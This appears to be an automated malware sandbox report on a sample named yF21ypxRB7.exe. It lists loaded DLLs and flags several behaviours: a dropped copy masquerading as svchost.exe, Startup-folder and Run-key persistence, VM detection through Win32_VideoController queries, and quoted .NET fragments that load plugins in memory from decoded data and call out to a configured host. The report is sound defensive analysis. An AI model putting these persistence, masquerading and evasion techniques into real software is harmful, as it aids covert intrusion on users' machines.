Source: C:\Users\user\Desktop\yF21ypxRB7.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\yF21ypxRB7.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\yF21ypxRB7.exe Section loaded: avicap32.dll Jump to behavior
Source: C:\Users\user\Desktop\yF21ypxRB7.exe Section loaded: msvfw32.dll Jump to behavior
Source: C:\Users\user\Desktop\yF21ypxRB7.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: moshost.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: mapsbtsvc.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: mosstorage.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: ztrace_maps.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: ztrace_maps.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: mapconfiguration.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: aphostservice.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: networkhelper.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: userdataplatformhelperutil.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: umpdc.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: syncutil.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: mccspal.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: vaultcli.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: dmcfgutils.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: dmcmnutils.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: dmxmlhelputils.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: xmllite.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: inproclogger.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: flightsettings.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: windows.networking.connectivity.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: npmproxy.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: msv1_0.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: ntlmshared.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: cryptdll.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: synccontroller.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: pimstore.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: aphostclient.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: accountaccessor.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: dsclient.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: powrprof.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: powrprof.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: systemeventsbrokerclient.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: userdatalanguageutil.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: mccsengineshared.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: pimstore.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: cemapi.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: userdatatypehelperutil.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: phoneutil.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: execmodelproxy.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: rmclient.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: storsvc.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: devobj.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: fltlib.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: bcd.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: wer.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: cabinet.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: appxdeploymentclient.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: storageusage.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: w32time.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: logoncli.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: powrprof.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: umpdc.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: dsrole.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: vmictimeprovider.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Program Files\Windows Defender\MpCmdRun.exe Section loaded: mpclient.dll Jump to behavior
Source: C:\Program Files\Windows Defender\MpCmdRun.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Program Files\Windows Defender\MpCmdRun.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Program Files\Windows Defender\MpCmdRun.exe Section loaded: version.dll Jump to behavior
Source: C:\Program Files\Windows Defender\MpCmdRun.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Program Files\Windows Defender\MpCmdRun.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Program Files\Windows Defender\MpCmdRun.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Program Files\Windows Defender\MpCmdRun.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Program Files\Windows Defender\MpCmdRun.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Program Files\Windows Defender\MpCmdRun.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Program Files\Windows Defender\MpCmdRun.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Program Files\Windows Defender\MpCmdRun.exe Section loaded: wscapi.dll Jump to behavior
Source: C:\Program Files\Windows Defender\MpCmdRun.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Program Files\Windows Defender\MpCmdRun.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Program Files\Windows Defender\MpCmdRun.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Program Files\Windows Defender\MpCmdRun.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Program Files\Windows Defender\MpCmdRun.exe Section loaded: slc.dll Jump to behavior
Source: C:\Program Files\Windows Defender\MpCmdRun.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\Desktop\yF21ypxRB7.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}\InProcServer32 Jump to behavior
Source: svchost.lnk.0.dr LNK file: ..\..\..\..\..\svchost.exe
Source: yF21ypxRB7.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: yF21ypxRB7.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Data Obfuscation
barindex
.NET source code contains method to dynamically call methods (often used by packers)
Source: yF21ypxRB7.exe, Messages.cs .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
Source: yF21ypxRB7.exe, Messages.cs .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
Source: svchost.exe.0.dr, Messages.cs .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
Source: svchost.exe.0.dr, Messages.cs .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
.NET source code contains potential unpacker
Source: yF21ypxRB7.exe, Messages.cs .Net Code: Plugin System.AppDomain.Load(byte[])
Source: yF21ypxRB7.exe, Messages.cs .Net Code: Memory System.AppDomain.Load(byte[])
Source: yF21ypxRB7.exe, Messages.cs .Net Code: Memory
Source: svchost.exe.0.dr, Messages.cs .Net Code: Plugin System.AppDomain.Load(byte[])
Source: svchost.exe.0.dr, Messages.cs .Net Code: Memory System.AppDomain.Load(byte[])
Source: svchost.exe.0.dr, Messages.cs .Net Code: Memory
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\yF21ypxRB7.exe Code function: 0_2_00007FFAAC5B32A7 pushad ; ret 0_2_00007FFAAC5B32C1
Source: C:\Users\user\AppData\Roaming\svchost.exe Code function: 8_2_00007FFAAC5700BD pushad ; iretd 8_2_00007FFAAC5700C1

Persistence and Installation Behavior
barindex
Drops PE files with benign system names
Source: C:\Users\user\Desktop\yF21ypxRB7.exe File created: C:\Users\user\AppData\Roaming\svchost.exe Jump to dropped file
Drops PE files
Source: C:\Users\user\Desktop\yF21ypxRB7.exe File created: C:\Users\user\AppData\Roaming\svchost.exe Jump to dropped file
Creates a start menu entry (Start Menu\Programs\Startup)
Source: C:\Users\user\Desktop\yF21ypxRB7.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.lnk Jump to behavior
Modifies existing windows services
Source: C:\Windows\System32\svchost.exe Registry key value modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\W32Time\Config Jump to behavior
Stores files to the Windows start menu directory
Source: C:\Users\user\Desktop\yF21ypxRB7.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.lnk Jump to behavior
Source: C:\Users\user\Desktop\yF21ypxRB7.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run svchost Jump to behavior
Source: C:\Users\user\Desktop\yF21ypxRB7.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run svchost Jump to behavior
Source: C:\Users\user\Desktop\yF21ypxRB7.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\yF21ypxRB7.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\yF21ypxRB7.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\yF21ypxRB7.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\yF21ypxRB7.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\yF21ypxRB7.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\yF21ypxRB7.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\yF21ypxRB7.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\yF21ypxRB7.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\yF21ypxRB7.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\yF21ypxRB7.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\yF21ypxRB7.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\yF21ypxRB7.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\yF21ypxRB7.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\yF21ypxRB7.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\yF21ypxRB7.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\yF21ypxRB7.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\yF21ypxRB7.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\yF21ypxRB7.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\yF21ypxRB7.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\yF21ypxRB7.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\yF21ypxRB7.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\yF21ypxRB7.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\yF21ypxRB7.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\yF21ypxRB7.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\yF21ypxRB7.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\yF21ypxRB7.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\yF21ypxRB7.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\yF21ypxRB7.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\yF21ypxRB7.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\yF21ypxRB7.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\yF21ypxRB7.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\yF21ypxRB7.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\yF21ypxRB7.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\yF21ypxRB7.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\yF21ypxRB7.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\yF21ypxRB7.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\yF21ypxRB7.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\yF21ypxRB7.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\yF21ypxRB7.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\yF21ypxRB7.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\yF21ypxRB7.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\yF21ypxRB7.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\yF21ypxRB7.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\yF21ypxRB7.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\yF21ypxRB7.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\yF21ypxRB7.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\yF21ypxRB7.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\yF21ypxRB7.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\yF21ypxRB7.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\yF21ypxRB7.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\yF21ypxRB7.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\yF21ypxRB7.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\yF21ypxRB7.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\yF21ypxRB7.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\yF21ypxRB7.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Windows Defender\MpCmdRun.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Windows Defender\MpCmdRun.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Windows Defender\MpCmdRun.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Windows Defender\MpCmdRun.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Windows Defender\MpCmdRun.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Windows Defender\MpCmdRun.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion
barindex
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Source: C:\Users\user\Desktop\yF21ypxRB7.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\yF21ypxRB7.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\yF21ypxRB7.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\yF21ypxRB7.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\yF21ypxRB7.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\yF21ypxRB7.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\yF21ypxRB7.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\yF21ypxRB7.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\yF21ypxRB7.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\yF21ypxRB7.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\yF21ypxRB7.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\yF21ypxRB7.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\yF21ypxRB7.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\yF21ypxRB7.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\yF21ypxRB7.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\yF21ypxRB7.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\yF21ypxRB7.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\yF21ypxRB7.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\yF21ypxRB7.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
